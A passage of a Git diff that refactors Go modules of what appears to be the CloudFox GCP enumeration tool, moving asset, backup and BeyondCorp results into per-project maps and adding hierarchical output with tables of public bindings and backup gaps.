:= range m.Assets { - publicAccess := "No" - if asset.PublicAccess { - publicAccess = "Yes" - } - // If no IAM bindings, still show the asset - if len(asset.IAMBindings) == 0 { - body = append(body, []string{ - asset.ProjectID, - m.GetProjectName(asset.ProjectID), - asset.Name, - assetservice.ExtractAssetTypeShort(asset.AssetType), - asset.Location, - "-", - "-", - publicAccess, - }) - } else { - // One row per member per role - for _, binding := range asset.IAMBindings { - for _, member := range binding.Members { - body = append(body, []string{ + // Public assets table + var publicBody [][]string + for _, asset := range assets { + if asset.PublicAccess { + for _, binding := range asset.IAMBindings { + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + publicBody = append(publicBody, []string{ asset.ProjectID, m.GetProjectName(asset.ProjectID), asset.Name, - assetservice.ExtractAssetTypeShort(asset.AssetType), - asset.Location, + asset.AssetType, binding.Role, member, - publicAccess, }) } } } } + } + + if len(publicBody) > 0 { tables = append(tables, internal.TableFile{ - Name: "assets", - Header: header, - Body: body, + Name: "public-assets", + Header: []string{"Project ID", "Project Name", "Name", "Asset Type", "Resource Role", "Resource Principal"}, + Body: publicBody, }) + } + } else { + header := []string{"Project ID", "Project Name", "Name", "Asset Type", "Location"} + var body [][]string + for _, asset := range assets { + body = append(body, []string{ + asset.ProjectID, + m.GetProjectName(asset.ProjectID), + asset.Name, + assetservice.ExtractAssetTypeShort(asset.AssetType), + asset.Location, + }) + } + tables = append(tables, internal.TableFile{ + Name: "assets", + Header: header, + Body: body, + }) + } - // Public assets table - var publicBody [][]string - for _, asset := range m.Assets { - if asset.PublicAccess { - for _, binding := range asset.IAMBindings { - for _, member := range binding.Members { - if member == "allUsers" || member == "allAuthenticatedUsers" { - publicBody = append(publicBody, []string{ - asset.ProjectID, - m.GetProjectName(asset.ProjectID), - asset.Name, - asset.AssetType, - binding.Role, - member, - }) - } - } - } - } - } + return tables +} - if len(publicBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "public-assets", - Header: []string{"Project ID", "Project Name", "Name", "Asset Type", "Role", "Member"}, - Body: publicBody, - }) - } - } else { - // Basic listing without IAM - header := []string{"Project ID", "Project Name", "Name", "Asset Type", "Location"} - var body [][]string - for _, asset := range m.Assets { - body = append(body, []string{ - asset.ProjectID, - m.GetProjectName(asset.ProjectID), - asset.Name, - assetservice.ExtractAssetTypeShort(asset.AssetType), - asset.Location, - }) - } - tables = append(tables, internal.TableFile{ - Name: "assets", - Header: header, - Body: body, - }) +func (m *AssetInventoryModule) buildDependenciesTable(deps []ResourceDependency) *internal.TableFile { + if len(deps) == 0 { + return nil + } + + depsHeader := []string{"Project ID", "Project Name", "Source", "Dependency Type", "Target", "Target Type"} + var depsBody [][]string + for _, d := range deps { + depsBody = append(depsBody, []string{ + d.ProjectID, + m.GetProjectName(d.ProjectID), + m.extractResourceName(d.SourceResource), + d.DependencyType, + m.extractResourceName(d.TargetResource), + assetservice.ExtractAssetTypeShort(d.TargetType), + }) + } + + return &internal.TableFile{ + Name: "asset-dependencies", + Header: depsHeader, + Body: depsBody, + } +} + +func (m *AssetInventoryModule) buildCrossProjectTable() *internal.TableFile { + if len(m.CrossProject) == 0 { + return nil + } + + crossHeader := []string{"Resource", "Type", "Owner Project", "Accessed From"} + var crossBody [][]string + for _, c := range m.CrossProject { + crossBody = append(crossBody, []string{ + m.extractResourceName(c.ResourceName), + assetservice.ExtractAssetTypeShort(c.ResourceType), + c.OwnerProject, + strings.Join(c.AccessedFrom, ", "), + }) + } + + return &internal.TableFile{ + Name: "cross-project-resources", + Header: crossHeader, + Body: crossBody, + } +} + +func (m *AssetInventoryModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if counts, ok := m.ProjectTypeCounts[projectID]; ok { + if table := m.buildCountsTable(counts); table != nil { + tableFiles = append(tableFiles, *table) } } - // Dependencies table (if we have dependencies) - if len(m.Dependencies) > 0 { - depsHeader := []string{"Project ID", "Project Name", "Source", "Dependency Type", "Target", "Target Type"} - var depsBody [][]string - for _, d := range m.Dependencies { - depsBody = append(depsBody, []string{ - d.ProjectID, - m.GetProjectName(d.ProjectID), - m.extractResourceName(d.SourceResource), - d.DependencyType, - m.extractResourceName(d.TargetResource), - assetservice.ExtractAssetTypeShort(d.TargetType), - }) + if assets, ok := m.ProjectAssets[projectID]; ok { + tableFiles = append(tableFiles, m.buildAssetsTable(assets)...) + } - // Add to loot - m.LootMap["asset-inventory-details"].Contents += fmt.Sprintf( - "# Dependency: %s -> %s (%s)\n", - m.extractResourceName(d.SourceResource), - m.extractResourceName(d.TargetResource), - d.DependencyType, - ) + if deps, ok := m.ProjectDependencies[projectID]; ok { + if table := m.buildDependenciesTable(deps); table != nil { + tableFiles = append(tableFiles, *table) } - tables = append(tables, internal.TableFile{ - Name: "asset-dependencies", - Header: depsHeader, - Body: depsBody, - }) } - // Cross-project resources table (if we have cross-project resources) - if len(m.CrossProject) > 0 { - crossHeader := []string{"Resource", "Type", "Owner Project", "Accessed From"} - var crossBody [][]string - for _, c := range m.CrossProject { - crossBody = append(crossBody, []string{ - m.extractResourceName(c.ResourceName), - assetservice.ExtractAssetTypeShort(c.ResourceType), - c.OwnerProject, - strings.Join(c.AccessedFrom, ", "), - }) + return tableFiles +} + +func (m *AssetInventoryModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectAssets { + projectIDs[projectID] = true + } + for projectID := range m.ProjectTypeCounts { + projectIDs[projectID] = true + } + for projectID := range m.ProjectDependencies { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = AssetInventoryOutput{Table: tableFiles, Loot: lootFiles} + } + + // Add cross-project table at org level if we have hierarchy and cross-project data + if crossTable := m.buildCrossProjectTable(); crossTable != nil && m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID := m.Hierarchy.Organizations[0].ID + outputData.OrgLevelData[orgID] = AssetInventoryOutput{ + Table: []internal.TableFile{*crossTable}, + Loot: nil, } - tables = append(tables, internal.TableFile{ - Name: "cross-project-resources", - Header: crossHeader, - Body: crossBody, - }) + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } +} + +func (m *AssetInventoryModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + allCounts := m.getAllTypeCounts() + if table := m.buildCountsTable(allCounts); table != nil { + tables = append(tables, *table) + } + + allAssets := m.getAllAssets() + tables = append(tables, m.buildAssetsTable(allAssets)...) + + allDeps := m.getAllDependencies() + if table := m.buildDependenciesTable(allDeps); table != nil { + tables = append(tables, *table) + } + + if table := m.buildCrossProjectTable(); table != nil { + tables = append(tables, *table) } var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } } } diff --git a/gcp/commands/backupinventory.go b/gcp/commands/backupinventory.go index 09d5a602..725f0727 100644 --- a/gcp/commands/backupinventory.go +++ b/gcp/commands/backupinventory.go @@ -81,10 +81,10 @@ type ComputeSnapshot struct { type BackupInventoryModule struct { gcpinternal.BaseGCPModule - Resources []BackupResource - Snapshots []ComputeSnapshot - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectResources map[string][]BackupResource // projectID -> resources + ProjectSnapshots map[string][]ComputeSnapshot // projectID -> snapshots + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex // Tracking maps disksWithBackups map[string]bool @@ -127,16 +127,14 @@ func runGCPBackupInventoryCommand(cmd *cobra.Command, args []string) { module := &BackupInventoryModule{ BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Resources: []BackupResource{}, - Snapshots: []ComputeSnapshot{}, - LootMap: make(map[string]*internal.LootFile), + ProjectResources: make(map[string][]BackupResource), + ProjectSnapshots: make(map[string][]ComputeSnapshot), + LootMap: make(map[string]map[string]*internal.LootFile), disksWithBackups: make(map[string]bool), sqlWithBackups: make(map[string]bool), allDisks: make(map[string]diskInfo), allSQLInstances: make(map[string]sqlInstanceInfo), } - - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -172,7 +170,10 @@ func (m *BackupInventoryModule) Execute(ctx context.Context, logger internal.Log // Identify unprotected resources m.identifyUnprotectedResources() - if len(m.Resources) == 0 && len(m.Snapshots) == 0 { + allResources := m.getAllResources() + allSnapshots := m.getAllSnapshots() + + if len(allResources) == 0 && len(allSnapshots) == 0 { logger.InfoM("No backup data found", GCP_BACKUPINVENTORY_MODULE_NAME) return } @@ -180,7 +181,7 @@ func (m *BackupInventoryModule) Execute(ctx context.Context, logger internal.Log // Count protected vs unprotected protectedCount := 0 unprotectedCount := 0 - for _, r := range m.Resources { + for _, r := range allResources { if r.Protected { protectedCount++ } else { @@ -190,14 +191,14 @@ func (m *BackupInventoryModule) Execute(ctx context.Context, logger internal.Log // Count public snapshots publicSnapshotCount := 0 - for _, s := range m.Snapshots { + for _, s := range allSnapshots { if s.PublicAccess { publicSnapshotCount++ } } logger.SuccessM(fmt.Sprintf("Found %d resource(s): %d protected, %d unprotected, %d snapshot(s)", - len(m.Resources), protectedCount, unprotectedCount, len(m.Snapshots)), GCP_BACKUPINVENTORY_MODULE_NAME) + len(allResources), protectedCount, unprotectedCount, len(allSnapshots)), GCP_BACKUPINVENTORY_MODULE_NAME) if unprotectedCount > 0 { logger.InfoM(fmt.Sprintf("Found %d resource(s) without backup coverage", unprotectedCount), GCP_BACKUPINVENTORY_MODULE_NAME) @@ -210,6 +211,22 @@ func (m *BackupInventoryModule) Execute(ctx context.Context, logger internal.Log m.writeOutput(ctx, logger) } +func (m *BackupInventoryModule) getAllResources() []BackupResource { + var all []BackupResource + for _, resources := range m.ProjectResources { + all = append(all, resources...) + } + return all +} + +func (m *BackupInventoryModule) getAllSnapshots() []ComputeSnapshot { + var all []ComputeSnapshot + for _, snapshots := range m.ProjectSnapshots { + all = append(all, snapshots...) + } + return all +} + // ------------------------------ // Project Processor // ------------------------------ @@ -218,6 +235,17 @@ func (m *BackupInventoryModule) processProject(ctx context.Context, projectID st logger.InfoM(fmt.Sprintf("Enumerating backups for project: %s", projectID), GCP_BACKUPINVENTORY_MODULE_NAME) } + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["backup-inventory-commands"] = &internal.LootFile{ + Name: "backup-inventory-commands", + Contents: "# Backup Inventory Commands\n# Generated by CloudFox\n\n", + } + } + m.mu.Unlock() + // List all disks first (for gap analysis) m.enumerateDisks(ctx, projectID, computeService, logger) @@ -293,7 +321,7 @@ func (m *BackupInventoryModule) enumerateSnapshots(ctx context.Context, projectI } m.mu.Lock() - m.Snapshots = append(m.Snapshots, snap) + m.ProjectSnapshots[projectID] = append(m.ProjectSnapshots[projectID], snap) m.disksWithBackups[snapshot.SourceDisk] = true m.mu.Unlock() } @@ -311,12 +339,14 @@ func (m *BackupInventoryModule) enumerateSnapshots(ctx context.Context, projectI } func (m *BackupInventoryModule) trackSnapshotProtection(projectID string) { + m.mu.Lock() + projectSnapshots := m.ProjectSnapshots[projectID] + m.mu.Unlock() + // Group snapshots by source disk diskSnapshots := make(map[string][]ComputeSnapshot) - for _, snap := range m.Snapshots { - if snap.ProjectID == projectID { - diskSnapshots[snap.SourceDisk] = append(diskSnapshots[snap.SourceDisk], snap) - } + for _, snap := range projectSnapshots { + diskSnapshots[snap.SourceDisk] = append(diskSnapshots[snap.SourceDisk], snap) } m.mu.Lock() @@ -361,7 +391,7 @@ func (m *BackupInventoryModule) trackSnapshotProtection(projectID string) { BackupLocation: strings.Join(latestSnap.StorageLocats, ","), } - m.Resources = append(m.Resources, resource) + m.ProjectResources[projectID] = append(m.ProjectResources[projectID], resource) } } @@ -437,7 +467,7 @@ func (m *BackupInventoryModule) enumerateSQLBackups(ctx context.Context, project } m.mu.Lock() - m.Resources = append(m.Resources, resource) + m.ProjectResources[projectID] = append(m.ProjectResources[projectID], resource) m.mu.Unlock() } } @@ -463,19 +493,28 @@ func (m *BackupInventoryModule) identifyUnprotectedResources() { BackupType: "none", } - m.Resources = append(m.Resources, resource) - - // Add to loot - m.LootMap["backup-inventory-commands"].Contents += fmt.Sprintf( - "# Unprotected disk: %s (%s) - %dGB\n"+ - "gcloud compute resource-policies create snapshot-schedule %s-backup \\\n"+ - " --project=%s \\\n"+ - " --region=%s \\\n"+ - " --max-retention-days=30 \\\n"+ - " --daily-schedule\n\n", - info.Name, info.ProjectID, info.SizeGB, - info.Name, info.ProjectID, m.extractRegionFromZone(info.Zone), - ) + m.ProjectResources[info.ProjectID] = append(m.ProjectResources[info.ProjectID], resource) + + // Add to loot (ensure project loot is initialized) + if m.LootMap[info.ProjectID] == nil { + m.LootMap[info.ProjectID] = make(map[string]*internal.LootFile) + m.LootMap[info.ProjectID]["backup-inventory-commands"] = &internal.LootFile{ + Name: "backup-inventory-commands", + Contents: "# Backup Inventory Commands\n# Generated by CloudFox\n\n", + } + } + if lootFile := m.LootMap[info.ProjectID]["backup-inventory-commands"]; lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# Unprotected disk: %s (%s) - %dGB\n"+ + "gcloud compute resource-policies create snapshot-schedule %s-backup \\\n"+ + " --project=%s \\\n"+ + " --region=%s \\\n"+ + " --max-retention-days=30 \\\n"+ + " --daily-schedule\n\n", + info.Name, info.ProjectID, info.SizeGB, + info.Name, info.ProjectID, m.extractRegionFromZone(info.Zone), + ) + } } } @@ -491,16 +530,25 @@ func (m *BackupInventoryModule) identifyUnprotectedResources() { BackupType: "none", } - m.Resources = append(m.Resources, resource) + m.ProjectResources[info.ProjectID] = append(m.ProjectResources[info.ProjectID], resource) - // Add to loot - m.LootMap["backup-inventory-commands"].Contents += fmt.Sprintf( - "# Unprotected SQL instance: %s\n"+ - "gcloud sql instances patch %s \\\n"+ - " --backup-start-time=02:00 \\\n"+ - " --enable-bin-log\n\n", - instanceName, instanceName, - ) + // Add to loot (ensure project loot is initialized) + if m.LootMap[info.ProjectID] == nil { + m.LootMap[info.ProjectID] = make(map[string]*internal.LootFile) + m.LootMap[info.ProjectID]["backup-inventory-commands"] = &internal.LootFile{ + Name: "backup-inventory-commands", + Contents: "# Backup Inventory Commands\n# Generated by CloudFox\n\n", + } + } + if lootFile := m.LootMap[info.ProjectID]["backup-inventory-commands"]; lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# Unprotected SQL instance: %s\n"+ + "gcloud sql instances patch %s \\\n"+ + " --backup-start-time=02:00 \\\n"+ + " --enable-bin-log\n\n", + instanceName, instanceName, + ) + } } } } @@ -540,204 +588,260 @@ func (m *BackupInventoryModule) extractRegionFromZone(zone string) string { return zone } -// ------------------------------ -// Loot File Management -// ------------------------------ -func (m *BackupInventoryModule) initializeLootFiles() { - m.LootMap["backup-inventory-commands"] = &internal.LootFile{ - Name: "backup-inventory-commands", - Contents: "# Backup Inventory Commands\n" + - "# Generated by CloudFox\n\n", - } -} // ------------------------------ // Output Generation // ------------------------------ func (m *BackupInventoryModule) writeOutput(ctx context.Context, logger internal.Logger) { - var tables []internal.TableFile + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *BackupInventoryModule) getResourcesHeader() []string { + return []string{ + "Project ID", + "Project Name", + "Resource", + "Type", + "Location", + "Size (GB)", + "Protected", + "Backup Type", + "Schedule", + "Retention", + "Last Backup", + "Count", + "Status", + "PITR", + } +} + +func (m *BackupInventoryModule) getSnapshotsHeader() []string { + return []string{ + "Project ID", + "Project Name", + "Snapshot", + "Source Disk", + "Size (GB)", + "Created", + "Status", + "Type", + "Auto Created", + "Locations", + "Resource Role", + "Resource Principal", + "Public", + } +} - // Main backup inventory table (all resources) - if len(m.Resources) > 0 { - header := []string{ - "Project ID", - "Project Name", - "Resource", - "Type", - "Location", - "Size (GB)", - "Protected", - "Backup Type", - "Schedule", - "Retention", - "Last Backup", - "Count", - "Status", - "PITR", +func (m *BackupInventoryModule) resourcesToTableBody(resources []BackupResource) [][]string { + var body [][]string + for _, r := range resources { + protectedStr := "No" + if r.Protected { + protectedStr = "Yes" } - var body [][]string - for _, r := range m.Resources { - protectedStr := "No" - if r.Protected { - protectedStr = "Yes" - } + pitrStr := "No" + if r.PITREnabled { + pitrStr = "Yes" + } - pitrStr := "No" - if r.PITREnabled { - pitrStr = "Yes" - } + retentionStr := "" + if r.RetentionDays > 0 { + retentionStr = fmt.Sprintf("%d days", r.RetentionDays) + } - retentionStr := "" - if r.RetentionDays > 0 { - retentionStr = fmt.Sprintf("%d days", r.RetentionDays) - } + sizeStr := "" + if r.SizeGB > 0 { + sizeStr = fmt.Sprintf("%d", r.SizeGB) + } - sizeStr := "" - if r.SizeGB > 0 { - sizeStr = fmt.Sprintf("%d", r.SizeGB) - } + countStr := "" + if r.BackupCount > 0 { + countStr = fmt.Sprintf("%d", r.BackupCount) + } - countStr := "" - if r.BackupCount > 0 { - countStr = fmt.Sprintf("%d", r.BackupCount) - } + body = append(body, []string{ + r.ProjectID, + m.GetProjectName(r.ProjectID), + r.Name, + r.ResourceType, + r.Location, + sizeStr, + protectedStr, + r.BackupType, + r.Schedule, + retentionStr, + r.LastBackup, + countStr, + r.BackupStatus, + pitrStr, + }) + } + return body +} +func (m *BackupInventoryModule) snapshotsToTableBody(snapshots []ComputeSnapshot) [][]string { + var body [][]string + for _, s := range snapshots { + autoCreatedStr := "No" + if s.AutoCreated { + autoCreatedStr = "Yes" + } + + publicAccess := "No" + if s.PublicAccess { + publicAccess = "Yes" + } + + // If no IAM bindings, still show the snapshot + if len(s.IAMBindings) == 0 { body = append(body, []string{ - r.ProjectID, - m.GetProjectName(r.ProjectID), - r.Name, - r.ResourceType, - r.Location, - sizeStr, - protectedStr, - r.BackupType, - r.Schedule, - retentionStr, - r.LastBackup, - countStr, - r.BackupStatus, - pitrStr, + s.ProjectID, + m.GetProjectName(s.ProjectID), + s.Name, + m.extractDiskName(s.SourceDisk), + fmt.Sprintf("%d", s.DiskSizeGB), + s.CreationTime, + s.Status, + s.SnapshotType, + autoCreatedStr, + strings.Join(s.StorageLocats, ","), + "-", + "-", + publicAccess, }) + } else { + // One row per member per role + for _, binding := range s.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + s.ProjectID, + m.GetProjectName(s.ProjectID), + s.Name, + m.extractDiskName(s.SourceDisk), + fmt.Sprintf("%d", s.DiskSizeGB), + s.CreationTime, + s.Status, + s.SnapshotType, + autoCreatedStr, + strings.Join(s.StorageLocats, ","), + binding.Role, + member, + publicAccess, + }) + } + } } + } + return body +} - tables = append(tables, internal.TableFile{ +func (m *BackupInventoryModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if resources, ok := m.ProjectResources[projectID]; ok && len(resources) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ Name: "backup-inventory", - Header: header, - Body: body, + Header: m.getResourcesHeader(), + Body: m.resourcesToTableBody(resources), }) } - // Snapshots table (one row per IAM binding member) - if len(m.Snapshots) > 0 { - header := []string{ - "Project ID", - "Project Name", - "Snapshot", - "Source Disk", - "Size (GB)", - "Created", - "Status", - "Type", - "Auto Created", - "Locations", - "Role", - "Member", - "Public", - } + if snapshots, ok := m.ProjectSnapshots[projectID]; ok && len(snapshots) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "backup-snapshots", + Header: m.getSnapshotsHeader(), + Body: m.snapshotsToTableBody(snapshots), + }) + } - var body [][]string - for _, s := range m.Snapshots { - autoCreatedStr := "No" - if s.AutoCreated { - autoCreatedStr = "Yes" - } + return tableFiles +} - publicAccess := "No" - if s.PublicAccess { - publicAccess = "Yes" - } +func (m *BackupInventoryModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } - // If no IAM bindings, still show the snapshot - if len(s.IAMBindings) == 0 { - body = append(body, []string{ - s.ProjectID, - m.GetProjectName(s.ProjectID), - s.Name, - m.extractDiskName(s.SourceDisk), - fmt.Sprintf("%d", s.DiskSizeGB), - s.CreationTime, - s.Status, - s.SnapshotType, - autoCreatedStr, - strings.Join(s.StorageLocats, ","), - "-", - "-", - publicAccess, - }) - } else { - // One row per member per role - for _, binding := range s.IAMBindings { - for _, member := range binding.Members { - body = append(body, []string{ - s.ProjectID, - m.GetProjectName(s.ProjectID), - s.Name, - m.extractDiskName(s.SourceDisk), - fmt.Sprintf("%d", s.DiskSizeGB), - s.CreationTime, - s.Status, - s.SnapshotType, - autoCreatedStr, - strings.Join(s.StorageLocats, ","), - binding.Role, - member, - publicAccess, - }) - } + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectResources { + projectIDs[projectID] = true + } + for projectID := range m.ProjectSnapshots { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) } } } + outputData.ProjectLevelData[projectID] = BackupInventoryOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_BACKUPINVENTORY_MODULE_NAME) + } +} + +func (m *BackupInventoryModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allResources := m.getAllResources() + allSnapshots := m.getAllSnapshots() + + var tables []internal.TableFile + + if len(allResources) > 0 { + tables = append(tables, internal.TableFile{ + Name: "backup-inventory", + Header: m.getResourcesHeader(), + Body: m.resourcesToTableBody(allResources), + }) + } + + if len(allSnapshots) > 0 { tables = append(tables, internal.TableFile{ Name: "backup-snapshots", - Header: header, - Body: body, + Header: m.getSnapshotsHeader(), + Body: m.snapshotsToTableBody(allSnapshots), }) } - // Collect loot files var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } } } - output := BackupInventoryOutput{ - Table: tables, - Loot: lootFiles, - } + output := BackupInventoryOutput{Table: tables, Loot: lootFiles} scopeNames := make([]string, len(m.ProjectIDs)) - for i, projectID := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(projectID) - } - - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", - m.ProjectIDs, - scopeNames, - m.Account, - output, - ) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) if err != nil { logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_BACKUPINVENTORY_MODULE_NAME) - m.CommandCounter.Error++ } } diff --git a/gcp/commands/beyondcorp.go b/gcp/commands/beyondcorp.go index 3741a5e6..f8bc82fd 100644 --- a/gcp/commands/beyondcorp.go +++ b/gcp/commands/beyondcorp.go @@ -28,10 +28,10 @@ Features: type BeyondCorpModule struct { gcpinternal.BaseGCPModule - AppConnectors []beyondcorpservice.AppConnectorInfo - AppConnections []beyondcorpservice.AppConnectionInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectAppConnectors map[string][]beyondcorpservice.AppConnectorInfo // projectID -> connectors + ProjectAppConnections map[string][]beyondcorpservice.AppConnectionInfo // projectID -> connections + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } type BeyondCorpOutput struct { @@ -49,19 +49,21 @@ func runGCPBeyondCorpCommand(cmd *cobra.Command, args []string) { } module := &BeyondCorpModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - AppConnectors: []beyondcorpservice.AppConnectorInfo{}, - AppConnections: []beyondcorpservice.AppConnectionInfo{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectAppConnectors: make(map[string][]beyondcorpservice.AppConnectorInfo), + ProjectAppConnections: make(map[string][]beyondcorpservice.AppConnectionInfo), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } func (m *BeyondCorpModule) Execute(ctx context.Context, logger internal.Logger) { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BEYONDCORP_MODULE_NAME, m.processProject) - totalCount := len(m.AppConnectors) + len(m.AppConnections) + allConnectors := m.getAllConnectors() + allConnections := m.getAllConnections() + + totalCount := len(allConnectors) + len(allConnections) if totalCount == 0 { logger.InfoM("No BeyondCorp resources found", globals.GCP_BEYONDCORP_MODULE_NAME) return @@ -70,19 +72,19 @@ func (m *BeyondCorpModule) Execute(ctx context.Context, logger internal.Logger) // Count public resources publicConnectorCount := 0 publicConnectionCount := 0 - for _, connector := range m.AppConnectors { + for _, connector := range allConnectors { if connector.PublicAccess { publicConnectorCount++ } } - for _, conn := range m.AppConnections { + for _, conn := range allConnections { if conn.PublicAccess { publicConnectionCount++ } } logger.SuccessM(fmt.Sprintf("Found %d connector(s), %d connection(s)", - len(m.AppConnectors), len(m.AppConnections)), + len(allConnectors), len(allConnections)), globals.GCP_BEYONDCORP_MODULE_NAME) if publicConnectorCount > 0 || publicConnectionCount > 0 { @@ -93,6 +95,22 @@ func (m *BeyondCorpModule) Execute(ctx context.Context, logger internal.Logger) m.writeOutput(ctx, logger) } +func (m *BeyondCorpModule) getAllConnectors() []beyondcorpservice.AppConnectorInfo { + var all []beyondcorpservice.AppConnectorInfo + for _, connectors := range m.ProjectAppConnectors { + all = append(all, connectors...) + } + return all +} + +func (m *BeyondCorpModule) getAllConnections() []beyondcorpservice.AppConnectionInfo { + var all []beyondcorpservice.AppConnectionInfo + for _, connections := range m.ProjectAppConnections { + all = append(all, connections...) + } + return all +} + func (m *BeyondCorpModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { logger.InfoM(fmt.Sprintf("Enumerating BeyondCorp in project: %s", projectID), globals.GCP_BEYONDCORP_MODULE_NAME) @@ -100,150 +118,236 @@ func (m *BeyondCorpModule) processProject(ctx context.Context, projectID string, svc := beyondcorpservice.New() + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["beyondcorp-details"] = &internal.LootFile{ + Name: "beyondcorp-details", + Contents: "# BeyondCorp Details\n# Generated by CloudFox\n\n", + } + } + m.mu.Unlock() + // Get app connectors connectors, _ := svc.ListAppConnectors(projectID) m.mu.Lock() - m.AppConnectors = append(m.AppConnectors, connectors...) + m.ProjectAppConnectors[projectID] = connectors m.mu.Unlock() // Get app connections connections, _ := svc.ListAppConnections(projectID) m.mu.Lock() - m.AppConnections = append(m.AppConnections, connections...) - m.mu.Unlock() - - m.mu.Lock() + m.ProjectAppConnections[projectID] = connections for _, conn := range connections { - m.addConnectionToLoot(conn) + m.addConnectionToLoot(projectID, conn) } m.mu.Unlock() } -func (m *BeyondCorpModule) initializeLootFiles() { - m.LootMap["beyondcorp-details"] = &internal.LootFile{ - Name: "beyondcorp-details", - Contents: "# BeyondCorp Details\n# Generated by CloudFox\n\n", +func (m *BeyondCorpModule) addConnectionToLoot(projectID string, conn beyondcorpservice.AppConnectionInfo) { + lootFile := m.LootMap[projectID]["beyondcorp-details"] + if lootFile == nil { + return } -} - -func (m *BeyondCorpModule) addConnectionToLoot(conn beyondcorpservice.AppConnectionInfo) { - m.LootMap["beyondcorp-details"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Connection: %s\n# Endpoint: %s\n# Gateway: %s\n# Connectors: %s\n", conn.Name, conn.ApplicationEndpoint, conn.Gateway, strings.Join(conn.Connectors, ", ")) if conn.ApplicationEndpoint != "" { - m.LootMap["beyondcorp-details"].Contents += 